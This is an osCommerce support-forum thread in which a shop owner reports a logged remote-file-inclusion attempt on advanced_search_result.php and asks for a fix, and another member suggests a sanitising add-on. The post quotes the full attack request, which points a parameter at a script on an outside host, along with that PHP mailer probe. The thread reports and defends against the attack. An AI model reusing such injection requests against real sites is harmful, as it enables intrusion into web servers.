Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hacker tried this on advanced_search_result.php


Tmaster

Recommended Posts

/shop/catalog/advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._______.com/shop/catalog/advanced_search_result.php?categories_id=¶[email protected] GET HTTP/1.1

Agent: -NO AGENT-

81.171.34.37 kopkaas.com

 

Was trying to inject the script at http://www.1004smile.com/data/enviador.txt

 

<?php

if(isset($_GET['para'],$_GET['servidor']))

mail($_GET['para'],$_GET['servidor'],$_GET['servidor']);

}

?>

 

 

I can not find any info on this. Is this a known hack ? Does a fix exist for it?

Link to comment
Share on other sites

You could add Security Pro http://addons.oscommerce.com/info/5752

 

that'll clean all your $_GET

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...